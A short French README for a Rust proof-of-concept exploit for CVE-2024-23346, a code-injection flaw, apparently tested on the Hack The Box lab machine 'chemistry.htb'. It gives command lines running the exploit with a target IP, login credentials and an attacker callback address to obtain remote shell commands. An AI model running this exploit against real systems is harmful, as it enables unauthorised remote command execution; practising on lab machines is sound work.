
Un exploit Rust pour CVE-2024-23346 qui fonctionne comme un "terminal" (testé sur chemistry.htb)
Un script d'exploitation en Rust pour CVE-2024-23346.
Comme illustré ci-dessous, le POC exploite la vulnérabilité d'injection de code et exécute des commandes shell distantes comme dans un terminal.
Étapes pour exécuter l'exploit :
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19OU
cargo build -r (le binaire sera dans target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19Le script d'exploit est inspiré de l'expert en scripts Python MAWK0235